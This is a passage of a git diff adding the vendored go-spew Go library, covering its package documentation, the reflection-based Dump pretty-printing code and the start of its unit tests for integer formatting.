verb +combinations. Any other verbs such as %x and %q will be sent to the the +standard fmt package for formatting. In addition, the custom formatter ignores +the width and precision arguments (however they will still work on the format +specifiers not handled by the custom formatter). + +Typically this function shouldn't be called directly. It is much easier to make +use of the custom formatter by calling one of the convenience functions such as +c.Printf, c.Println, or c.Printf. +*/ +func (c *ConfigState) NewFormatter(v interface{}) fmt.Formatter { + return newFormatter(c, v) +} + +// Fdump formats and displays the passed arguments to io.Writer w. It formats +// exactly the same as Dump. +func (c *ConfigState) Fdump(w io.Writer, a ...interface{}) { + fdump(c, w, a...) +} + +/* +Dump displays the passed parameters to standard out with newlines, customizable +indentation, and additional debug information such as complete types and all +pointer addresses used to indirect to the final value. It provides the +following features over the built-in printing facilities provided by the fmt +package: + + * Pointers are dereferenced and followed + * Circular data structures are detected and handled properly + * Custom Stringer/error interfaces are optionally invoked, including + on unexported types + * Custom types which only implement the Stringer/error interfaces via + a pointer receiver are optionally invoked when passing non-pointer + variables + * Byte arrays and slices are dumped like the hexdump -C command which + includes offsets, byte values in hex, and ASCII output + +The configuration options are controlled by modifying the public members +of c. See ConfigState for options documentation. + +See Fdump if you would prefer dumping to an arbitrary io.Writer or Sdump to +get the formatted result as a string. +*/ +func (c *ConfigState) Dump(a ...interface{}) { + fdump(c, os.Stdout, a...) +} + +// Sdump returns a string with the passed arguments formatted exactly the same +// as Dump. +func (c *ConfigState) Sdump(a ...interface{}) string { + var buf bytes.Buffer + fdump(c, &buf, a...) + return buf.String() +} + +// convertArgs accepts a slice of arguments and returns a slice of the same +// length with each argument converted to a spew Formatter interface using +// the ConfigState associated with s. +func (c *ConfigState) convertArgs(args []interface{}) (formatters []interface{}) { + formatters = make([]interface{}, len(args)) + for index, arg := range args { + formatters[index] = newFormatter(c, arg) + } + return formatters +} + +// NewDefaultConfig returns a ConfigState with the following default settings. +// +// Indent: " " +// MaxDepth: 0 +// DisableMethods: false +// DisablePointerMethods: false +// ContinueOnMethod: false +// SortKeys: false +func NewDefaultConfig() *ConfigState { + return &ConfigState{Indent: " "} +} diff --git a/vendor/github.com/davecgh/go-spew/spew/doc.go b/vendor/github.com/davecgh/go-spew/spew/doc.go new file mode 100644 index 0000000000..aacaac6f1e --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/doc.go @@ -0,0 +1,211 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +/* +Package spew implements a deep pretty printer for Go data structures to aid in +debugging. + +A quick overview of the additional features spew provides over the built-in +printing facilities for Go data types are as follows: + + * Pointers are dereferenced and followed + * Circular data structures are detected and handled properly + * Custom Stringer/error interfaces are optionally invoked, including + on unexported types + * Custom types which only implement the Stringer/error interfaces via + a pointer receiver are optionally invoked when passing non-pointer + variables + * Byte arrays and slices are dumped like the hexdump -C command which + includes offsets, byte values in hex, and ASCII output (only when using + Dump style) + +There are two different approaches spew allows for dumping Go data structures: + + * Dump style which prints with newlines, customizable indentation, + and additional debug information such as types and all pointer addresses + used to indirect to the final value + * A custom Formatter interface that integrates cleanly with the standard fmt + package and replaces %v, %+v, %#v, and %#+v to provide inline printing + similar to the default %v while providing the additional functionality + outlined above and passing unsupported format verbs such as %x and %q + along to fmt + +Quick Start + +This section demonstrates how to quickly get started with spew. See the +sections below for further details on formatting and configuration options. + +To dump a variable with full newlines, indentation, type, and pointer +information use Dump, Fdump, or Sdump: + spew.Dump(myVar1, myVar2, ...) + spew.Fdump(someWriter, myVar1, myVar2, ...) + str := spew.Sdump(myVar1, myVar2, ...) + +Alternatively, if you would prefer to use format strings with a compacted inline +printing style, use the convenience wrappers Printf, Fprintf, etc with +%v (most compact), %+v (adds pointer addresses), %#v (adds types), or +%#+v (adds types and pointer addresses): + spew.Printf("myVar1: %v -- myVar2: %+v", myVar1, myVar2) + spew.Printf("myVar3: %#v -- myVar4: %#+v", myVar3, myVar4) + spew.Fprintf(someWriter, "myVar1: %v -- myVar2: %+v", myVar1, myVar2) + spew.Fprintf(someWriter, "myVar3: %#v -- myVar4: %#+v", myVar3, myVar4) + +Configuration Options + +Configuration of spew is handled by fields in the ConfigState type. For +convenience, all of the top-level functions use a global state available +via the spew.Config global. + +It is also possible to create a ConfigState instance that provides methods +equivalent to the top-level functions. This allows concurrent configuration +options. See the ConfigState documentation for more details. + +The following configuration options are available: + * Indent + String to use for each indentation level for Dump functions. + It is a single space by default. A popular alternative is "\t". + + * MaxDepth + Maximum number of levels to descend into nested data structures. + There is no limit by default. + + * DisableMethods + Disables invocation of error and Stringer interface methods. + Method invocation is enabled by default. + + * DisablePointerMethods + Disables invocation of error and Stringer interface methods on types + which only accept pointer receivers from non-pointer variables. + Pointer method invocation is enabled by default. + + * DisablePointerAddresses + DisablePointerAddresses specifies whether to disable the printing of + pointer addresses. This is useful when diffing data structures in tests. + + * DisableCapacities + DisableCapacities specifies whether to disable the printing of + capacities for arrays, slices, maps and channels. This is useful when + diffing data structures in tests. + + * ContinueOnMethod + Enables recursion into types after invoking error and Stringer interface + methods. Recursion after method invocation is disabled by default. + + * SortKeys + Specifies map keys should be sorted before being printed. Use + this to have a more deterministic, diffable output. Note that + only native types (bool, int, uint, floats, uintptr and string) + and types which implement error or Stringer interfaces are + supported with other types sorted according to the + reflect.Value.String() output which guarantees display + stability. Natural map order is used by default. + + * SpewKeys + Specifies that, as a last resort attempt, map keys should be + spewed to strings and sorted by those strings. This is only + considered if SortKeys is true. + +Dump Usage + +Simply call spew.Dump with a list of variables you want to dump: + + spew.Dump(myVar1, myVar2, ...) + +You may also call spew.Fdump if you would prefer to output to an arbitrary +io.Writer. For example, to dump to standard error: + + spew.Fdump(os.Stderr, myVar1, myVar2, ...) + +A third option is to call spew.Sdump to get the formatted output as a string: + + str := spew.Sdump(myVar1, myVar2, ...) + +Sample Dump Output + +See the Dump example for details on the setup of the types and variables being +shown here. + + (main.Foo) { + unexportedField: (*main.Bar)(0xf84002e210)({ + flag: (main.Flag) flagTwo, + data: (uintptr) + }), + ExportedField: (map[interface {}]interface {}) (len=1) { + (string) (len=3) "one": (bool) true + } + } + +Byte (and uint8) arrays and slices are displayed uniquely like the hexdump -C +command as shown. + ([]uint8) (len=32 cap=32) { + 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 |............... | + 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 |!"#$%&'()*+,-./0| + 00000020 31 32 |12| + } + +Custom Formatter + +Spew provides a custom formatter that implements the fmt.Formatter interface +so that it integrates cleanly with standard fmt package printing functions. The +formatter is useful for inline printing of smaller data types similar to the +standard %v format specifier. + +The custom formatter only responds to the %v (most compact), %+v (adds pointer +addresses), %#v (adds types), or %#+v (adds types and pointer addresses) verb +combinations. Any other verbs such as %x and %q will be sent to the the +standard fmt package for formatting. In addition, the custom formatter ignores +the width and precision arguments (however they will still work on the format +specifiers not handled by the custom formatter). + +Custom Formatter Usage + +The simplest way to make use of the spew custom formatter is to call one of the +convenience functions such as spew.Printf, spew.Println, or spew.Printf. The +functions have syntax you are most likely already familiar with: + + spew.Printf("myVar1: %v -- myVar2: %+v", myVar1, myVar2) + spew.Printf("myVar3: %#v -- myVar4: %#+v", myVar3, myVar4) + spew.Println(myVar, myVar2) + spew.Fprintf(os.Stderr, "myVar1: %v -- myVar2: %+v", myVar1, myVar2) + spew.Fprintf(os.Stderr, "myVar3: %#v -- myVar4: %#+v", myVar3, myVar4) + +See the Index for the full list convenience functions. + +Sample Formatter Output + +Double pointer to a uint8: + %v: <**>5 + %+v: <**>(0xf8400420d0->0xf8400420c8)5 + %#v: (**uint8)5 + %#+v: (**uint8)(0xf8400420d0->0xf8400420c8)5 + +Pointer to circular struct with a uint8 field and a pointer to itself: + %v: <*>{1 <*>} + %+v: <*>(0xf84003e260){ui8:1 c:<*>(0xf84003e260)} + %#v: (*main.circular){ui8:(uint8)1 c:(*main.circular)} + %#+v: (*main.circular)(0xf84003e260){ui8:(uint8)1 c:(*main.circular)(0xf84003e260)} + +See the Printf example for details on the setup of variables being shown +here. + +Errors + +Since it is possible for custom Stringer/error interfaces to panic, spew +detects them and handles them internally by printing the panic information +inline with the output. Since spew is intended to provide deep pretty printing +capabilities on structures, it intentionally does not return any errors. +*/ +package spew diff --git a/vendor/github.com/davecgh/go-spew/spew/dump.go b/vendor/github.com/davecgh/go-spew/spew/dump.go new file mode 100644 index 0000000000..df1d582a72 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/dump.go @@ -0,0 +1,509 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +package spew + +import ( + "bytes" + "encoding/hex" + "fmt" + "io" + "os" + "reflect" + "regexp" + "strconv" + "strings" +) + +var ( + // uint8Type is a reflect.Type representing a uint8. It is used to + // convert cgo types to uint8 slices for hexdumping. + uint8Type = reflect.TypeOf(uint8(0)) + + // cCharRE is a regular expression that matches a cgo char. + // It is used to detect character arrays to hexdump them. + cCharRE = regexp.MustCompile("^.*\\._Ctype_char$") + + // cUnsignedCharRE is a regular expression that matches a cgo unsigned + // char. It is used to detect unsigned character arrays to hexdump + // them. + cUnsignedCharRE = regexp.MustCompile("^.*\\._Ctype_unsignedchar$") + + // cUint8tCharRE is a regular expression that matches a cgo uint8_t. + // It is used to detect uint8_t arrays to hexdump them. + cUint8tCharRE = regexp.MustCompile("^.*\\._Ctype_uint8_t$") +) + +// dumpState contains information about the state of a dump operation. +type dumpState struct { + w io.Writer + depth int + pointers map[uintptr]int + ignoreNextType bool + ignoreNextIndent bool + cs *ConfigState +} + +// indent performs indentation according to the depth level and cs.Indent +// option. +func (d *dumpState) indent() { + if d.ignoreNextIndent { + d.ignoreNextIndent = false + return + } + d.w.Write(bytes.Repeat([]byte(d.cs.Indent), d.depth)) +} + +// unpackValue returns values inside of non-nil interfaces when possible. +// This is useful for data types like structs, arrays, slices, and maps which +// can contain varying types packed inside an interface. +func (d *dumpState) unpackValue(v reflect.Value) reflect.Value { + if v.Kind() == reflect.Interface && !v.IsNil() { + v = v.Elem() + } + return v +} + +// dumpPtr handles formatting of pointers by indirecting them as necessary. +func (d *dumpState) dumpPtr(v reflect.Value) { + // Remove pointers at or below the current depth from map used to detect + // circular refs. + for k, depth := range d.pointers { + if depth >= d.depth { + delete(d.pointers, k) + } + } + + // Keep list of all dereferenced pointers to show later. + pointerChain := make([]uintptr, 0) + + // Figure out how many levels of indirection there are by dereferencing + // pointers and unpacking interfaces down the chain while detecting circular + // references. + nilFound := false + cycleFound := false + indirects := 0 + ve := v + for ve.Kind() == reflect.Ptr { + if ve.IsNil() { + nilFound = true + break + } + indirects++ + addr := ve.Pointer() + pointerChain = append(pointerChain, addr) + if pd, ok := d.pointers[addr]; ok && pd < d.depth { + cycleFound = true + indirects-- + break + } + d.pointers[addr] = d.depth + + ve = ve.Elem() + if ve.Kind() == reflect.Interface { + if ve.IsNil() { + nilFound = true + break + } + ve = ve.Elem() + } + } + + // Display type information. + d.w.Write(openParenBytes) + d.w.Write(bytes.Repeat(asteriskBytes, indirects)) + d.w.Write([]byte(ve.Type().String())) + d.w.Write(closeParenBytes) + + // Display pointer information. + if !d.cs.DisablePointerAddresses && len(pointerChain) > 0 { + d.w.Write(openParenBytes) + for i, addr := range pointerChain { + if i > 0 { + d.w.Write(pointerChainBytes) + } + printHexPtr(d.w, addr) + } + d.w.Write(closeParenBytes) + } + + // Display dereferenced value. + d.w.Write(openParenBytes) + switch { + case nilFound == true: + d.w.Write(nilAngleBytes) + + case cycleFound == true: + d.w.Write(circularBytes) + + default: + d.ignoreNextType = true + d.dump(ve) + } + d.w.Write(closeParenBytes) +} + +// dumpSlice handles formatting of arrays and slices. Byte (uint8 under +// reflection) arrays and slices are dumped in hexdump -C fashion. +func (d *dumpState) dumpSlice(v reflect.Value) { + // Determine whether this type should be hex dumped or not. Also, + // for types which should be hexdumped, try to use the underlying data + // first, then fall back to trying to convert them to a uint8 slice. + var buf []uint8 + doConvert := false + doHexDump := false + numEntries := v.Len() + if numEntries > 0 { + vt := v.Index(0).Type() + vts := vt.String() + switch { + // C types that need to be converted. + case cCharRE.MatchString(vts): + fallthrough + case cUnsignedCharRE.MatchString(vts): + fallthrough + case cUint8tCharRE.MatchString(vts): + doConvert = true + + // Try to use existing uint8 slices and fall back to converting + // and copying if that fails. + case vt.Kind() == reflect.Uint8: + // We need an addressable interface to convert the type + // to a byte slice. However, the reflect package won't + // give us an interface on certain things like + // unexported struct fields in order to enforce + // visibility rules. We use unsafe, when available, to + // bypass these restrictions since this package does not + // mutate the values. + vs := v + if !vs.CanInterface() || !vs.CanAddr() { + vs = unsafeReflectValue(vs) + } + if !UnsafeDisabled { + vs = vs.Slice(0, numEntries) + + // Use the existing uint8 slice if it can be + // type asserted. + iface := vs.Interface() + if slice, ok := iface.([]uint8); ok { + buf = slice + doHexDump = true + break + } + } + + // The underlying data needs to be converted if it can't + // be type asserted to a uint8 slice. + doConvert = true + } + + // Copy and convert the underlying type if needed. + if doConvert && vt.ConvertibleTo(uint8Type) { + // Convert and copy each element into a uint8 byte + // slice. + buf = make([]uint8, numEntries) + for i := 0; i < numEntries; i++ { + vv := v.Index(i) + buf[i] = uint8(vv.Convert(uint8Type).Uint()) + } + doHexDump = true + } + } + + // Hexdump the entire slice as needed. + if doHexDump { + indent := strings.Repeat(d.cs.Indent, d.depth) + str := indent + hex.Dump(buf) + str = strings.Replace(str, "\n", "\n"+indent, -1) + str = strings.TrimRight(str, d.cs.Indent) + d.w.Write([]byte(str)) + return + } + + // Recursively call dump for each item. + for i := 0; i < numEntries; i++ { + d.dump(d.unpackValue(v.Index(i))) + if i < (numEntries - 1) { + d.w.Write(commaNewlineBytes) + } else { + d.w.Write(newlineBytes) + } + } +} + +// dump is the main workhorse for dumping a value. It uses the passed reflect +// value to figure out what kind of object we are dealing with and formats it +// appropriately. It is a recursive function, however circular data structures +// are detected and handled properly. +func (d *dumpState) dump(v reflect.Value) { + // Handle invalid reflect values immediately. + kind := v.Kind() + if kind == reflect.Invalid { + d.w.Write(invalidAngleBytes) + return + } + + // Handle pointers specially. + if kind == reflect.Ptr { + d.indent() + d.dumpPtr(v) + return + } + + // Print type information unless already handled elsewhere. + if !d.ignoreNextType { + d.indent() + d.w.Write(openParenBytes) + d.w.Write([]byte(v.Type().String())) + d.w.Write(closeParenBytes) + d.w.Write(spaceBytes) + } + d.ignoreNextType = false + + // Display length and capacity if the built-in len and cap functions + // work with the value's kind and the len/cap itself is non-zero. + valueLen, valueCap := 0, 0 + switch v.Kind() { + case reflect.Array, reflect.Slice, reflect.Chan: + valueLen, valueCap = v.Len(), v.Cap() + case reflect.Map, reflect.String: + valueLen = v.Len() + } + if valueLen != 0 || !d.cs.DisableCapacities && valueCap != 0 { + d.w.Write(openParenBytes) + if valueLen != 0 { + d.w.Write(lenEqualsBytes) + printInt(d.w, int64(valueLen), 10) + } + if !d.cs.DisableCapacities && valueCap != 0 { + if valueLen != 0 { + d.w.Write(spaceBytes) + } + d.w.Write(capEqualsBytes) + printInt(d.w, int64(valueCap), 10) + } + d.w.Write(closeParenBytes) + d.w.Write(spaceBytes) + } + + // Call Stringer/error interfaces if they exist and the handle methods flag + // is enabled + if !d.cs.DisableMethods { + if (kind != reflect.Invalid) && (kind != reflect.Interface) { + if handled := handleMethods(d.cs, d.w, v); handled { + return + } + } + } + + switch kind { + case reflect.Invalid: + // Do nothing. We should never get here since invalid has already + // been handled above. + + case reflect.Bool: + printBool(d.w, v.Bool()) + + case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int: + printInt(d.w, v.Int(), 10) + + case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint: + printUint(d.w, v.Uint(), 10) + + case reflect.Float32: + printFloat(d.w, v.Float(), 32) + + case reflect.Float64: + printFloat(d.w, v.Float(), 64) + + case reflect.Complex64: + printComplex(d.w, v.Complex(), 32) + + case reflect.Complex128: + printComplex(d.w, v.Complex(), 64) + + case reflect.Slice: + if v.IsNil() { + d.w.Write(nilAngleBytes) + break + } + fallthrough + + case reflect.Array: + d.w.Write(openBraceNewlineBytes) + d.depth++ + if (d.cs.MaxDepth != 0) && (d.depth > d.cs.MaxDepth) { + d.indent() + d.w.Write(maxNewlineBytes) + } else { + d.dumpSlice(v) + } + d.depth-- + d.indent() + d.w.Write(closeBraceBytes) + + case reflect.String: + d.w.Write([]byte(strconv.Quote(v.String()))) + + case reflect.Interface: + // The only time we should get here is for nil interfaces due to + // unpackValue calls. + if v.IsNil() { + d.w.Write(nilAngleBytes) + } + + case reflect.Ptr: + // Do nothing. We should never get here since pointers have already + // been handled above. + + case reflect.Map: + // nil maps should be indicated as different than empty maps + if v.IsNil() { + d.w.Write(nilAngleBytes) + break + } + + d.w.Write(openBraceNewlineBytes) + d.depth++ + if (d.cs.MaxDepth != 0) && (d.depth > d.cs.MaxDepth) { + d.indent() + d.w.Write(maxNewlineBytes) + } else { + numEntries := v.Len() + keys := v.MapKeys() + if d.cs.SortKeys { + sortValues(keys, d.cs) + } + for i, key := range keys { + d.dump(d.unpackValue(key)) + d.w.Write(colonSpaceBytes) + d.ignoreNextIndent = true + d.dump(d.unpackValue(v.MapIndex(key))) + if i < (numEntries - 1) { + d.w.Write(commaNewlineBytes) + } else { + d.w.Write(newlineBytes) + } + } + } + d.depth-- + d.indent() + d.w.Write(closeBraceBytes) + + case reflect.Struct: + d.w.Write(openBraceNewlineBytes) + d.depth++ + if (d.cs.MaxDepth != 0) && (d.depth > d.cs.MaxDepth) { + d.indent() + d.w.Write(maxNewlineBytes) + } else { + vt := v.Type() + numFields := v.NumField() + for i := 0; i < numFields; i++ { + d.indent() + vtf := vt.Field(i) + d.w.Write([]byte(vtf.Name)) + d.w.Write(colonSpaceBytes) + d.ignoreNextIndent = true + d.dump(d.unpackValue(v.Field(i))) + if i < (numFields - 1) { + d.w.Write(commaNewlineBytes) + } else { + d.w.Write(newlineBytes) + } + } + } + d.depth-- + d.indent() + d.w.Write(closeBraceBytes) + + case reflect.Uintptr: + printHexPtr(d.w, uintptr(v.Uint())) + + case reflect.UnsafePointer, reflect.Chan, reflect.Func: + printHexPtr(d.w, v.Pointer()) + + // There were not any other types at the time this code was written, but + // fall back to letting the default fmt package handle it in case any new + // types are added. + default: + if v.CanInterface() { + fmt.Fprintf(d.w, "%v", v.Interface()) + } else { + fmt.Fprintf(d.w, "%v", v.String()) + } + } +} + +// fdump is a helper function to consolidate the logic from the various public +// methods which take varying writers and config states. +func fdump(cs *ConfigState, w io.Writer, a ...interface{}) { + for _, arg := range a { + if arg == nil { + w.Write(interfaceBytes) + w.Write(spaceBytes) + w.Write(nilAngleBytes) + w.Write(newlineBytes) + continue + } + + d := dumpState{w: w, cs: cs} + d.pointers = make(map[uintptr]int) + d.dump(reflect.ValueOf(arg)) + d.w.Write(newlineBytes) + } +} + +// Fdump formats and displays the passed arguments to io.Writer w. It formats +// exactly the same as Dump. +func Fdump(w io.Writer, a ...interface{}) { + fdump(&Config, w, a...) +} + +// Sdump returns a string with the passed arguments formatted exactly the same +// as Dump. +func Sdump(a ...interface{}) string { + var buf bytes.Buffer + fdump(&Config, &buf, a...) + return buf.String() +} + +/* +Dump displays the passed parameters to standard out with newlines, customizable +indentation, and additional debug information such as complete types and all +pointer addresses used to indirect to the final value. It provides the +following features over the built-in printing facilities provided by the fmt +package: + + * Pointers are dereferenced and followed + * Circular data structures are detected and handled properly + * Custom Stringer/error interfaces are optionally invoked, including + on unexported types + * Custom types which only implement the Stringer/error interfaces via + a pointer receiver are optionally invoked when passing non-pointer + variables + * Byte arrays and slices are dumped like the hexdump -C command which + includes offsets, byte values in hex, and ASCII output + +The configuration options are controlled by an exported package global, +spew.Config. See ConfigState for options documentation. + +See Fdump if you would prefer dumping to an arbitrary io.Writer or Sdump to +get the formatted result as a string. +*/ +func Dump(a ...interface{}) { + fdump(&Config, os.Stdout, a...) +} diff --git a/vendor/github.com/davecgh/go-spew/spew/dump_test.go b/vendor/github.com/davecgh/go-spew/spew/dump_test.go new file mode 100644 index 0000000000..5aad9c7af0 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/dump_test.go @@ -0,0 +1,1042 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +/* +Test Summary: +NOTE: For each test, a nil pointer, a single pointer and double pointer to the +base test element are also tested to ensure proper indirection across all types. + +- Max int8, int16, int32, int64, int +- Max uint8, uint16, uint32, uint64, uint +- Boolean true and false +- Standard complex64 and complex128 +- Array containing standard ints +- Array containing type with custom formatter on pointer receiver only +- Array containing interfaces +- Array containing bytes +- Slice containing standard float32 values +- Slice containing type with custom formatter on pointer receiver only +- Slice containing interfaces +- Slice containing bytes +- Nil slice +- Standard string +- Nil interface +- Sub-interface +- Map with string keys and int vals +- Map with custom formatter type on pointer receiver only keys and vals +- Map with interface keys and values +- Map with nil interface value +- Struct with primitives +- Struct that contains another struct +- Struct that contains custom type with Stringer pointer interface via both + exported and unexported fields +- Struct that contains embedded struct and field to same struct +- Uintptr to 0 (null pointer) +- Uintptr address of real variable +- Unsafe.Pointer to 0 (null pointer) +- Unsafe.Pointer to address of real variable +- Nil channel +- Standard int channel +- Function with no params and no returns +- Function with param and no returns +- Function with multiple params and multiple returns +- Struct that is circular through self referencing +- Structs that are circular through cross referencing +- Structs that are indirectly circular +- Type that panics in its Stringer interface +*/ + +package spew_test + +import ( + "bytes" + "fmt" + "testing" + "unsafe" + + "github.com/davecgh/go-spew/spew" +) + +// dumpTest is used to describe a test to be performed against the Dump method. +type dumpTest struct { + in interface{} + wants []string +} + +// dumpTests houses all of the tests to be performed against the Dump method. +var dumpTests = make([]dumpTest, 0) + +// addDumpTest is a helper method to append the passed input and desired result +// to dumpTests +func addDumpTest(in interface{}, wants ...string) { + test := dumpTest{in, wants} + dumpTests = append(dumpTests, test) +} + +func addIntDumpTests() { + // Max int8. + v := int8(127) + nv := (*int8)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "int8" + vs := "127" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Max int16. + v2 := int16(32767) + nv2 := (*int16)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "int16" + v2s := "32767" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv2, "(*"+v2t+")()\n") + + // Max int32. + v3 := int32(2147483647) + nv3 := (*int32)(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "int32" + v3s := "2147483647" + addDumpTest(v3, "("+v3t+") "+v3s+"\n") + addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n") + addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n") + addDumpTest(nv3, "(*"+v3t+")()\n") + + // Max int64. + v4 := int64(9223372036854775807) + nv4 := (*int64)(nil) + pv4 := &v4 + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "int64" + v4s := "9223372036854775807" + addDumpTest(v4, "("+v4t+") "+v4s+"\n") + addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n") + addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n") + addDumpTest(nv4, "(*"+v4t+")()\n") + + // Max int. + v5 := int(2147483647) + nv5 := (*int)(nil) + pv5 := &v5 + v5Addr := fmt.Sprintf("%p", pv5) + pv5Addr := fmt.Sprintf("%p", &pv5) + v5t := "int" + v5s := "2147483647" + addDumpTest(v5, "("+v5t+") "+v5s+"\n") + addDumpTest(pv5, "(*"+v5t+")("+v5Addr+")("+v5s+")\n") + addDumpTest(&pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")("+v5s+")\n") + addDumpTest(nv5, "(*"+v5t+")()\n") +} + +func addUintDumpTests() { + // Max uint8. + v := uint8(255) + nv := (*uint8)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "uint8" + vs := "255" + addDumpTest(v, "("+vt+") "+vs+"\n") + addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n") + addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n") + addDumpTest(nv, "(*"+vt+")()\n") + + // Max uint16. + v2 := uint16(65535) + nv2 := (*uint16)(nil) + pv2 := &v2 + v2Addr := fmt.Sprintf("%p", pv2) + pv2Addr := fmt.Sprintf("%p", &pv2) + v2t := "uint16" + v2s := "65535" + addDumpTest(v2, "("+v2t+") "+v2s+"\n") + addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n") + addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n") + addDumpTest(nv2, "(*"+v2t+")()\n") + + // Max uint32. + v3 := uint32(4294967295) + nv3 := (*uint32)(nil) + pv3 := &v3 + v3Addr := fmt.Sprintf("%p", pv3) + pv3Addr := fmt.Sprintf("%p", &pv3) + v3t := "uint32" + v3s := "4294967295" + addDumpTest(v3, "("+v3t+") "+v3s+"\n") + addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n") + addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n") + addDumpTest(nv3, "(*"+v3t+")()\n") + + // Max uint64. + v4 := uint64(18446744073709551615) + nv4 := (*uint64)(nil) + pv4 := &v4 + v4Addr := fmt.Sprintf("%p", pv4) + pv4Addr := fmt.Sprintf("%p", &pv4) + v4t := "uint64" + v4s := "18446744073709551615" + addDumpTest(v4, "("+v4t+") "+v4s+"\n") + addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n") + addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n") + addDumpTest(nv4, "(*"+v4t+")()\n") + + // Max uint. + v5 := uint(4294967295) + nv5 := (*uint)(nil) + pv5 := &v5 + v5Addr := fmt.Sprintf("%p", pv5) + pv5Addr := fmt.Sprintf("%p", &pv5) + v5t := "uint" + v5s := "4294967295" + addDumpTest(v5, "("+v5t+") "+v5s+"\n") + addDumpTest(pv5, "(*"+v5t+")("+v5Addr+")("+v5s+")\n") + addDumpTest(&pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")("+v5s+")\n") + addDumpTest(nv5, "(*"+v5t+")()\n") +} + +func addBoolDumpTests() { + // Boolean true. + v := bool(true) + nv := (*bool)(nil) + pv := &v + vAddr := fmt.Sprintf("%p", pv) + pvAddr := fmt.Sprintf("%p", &pv) + vt := "bool" + vs := "true" + 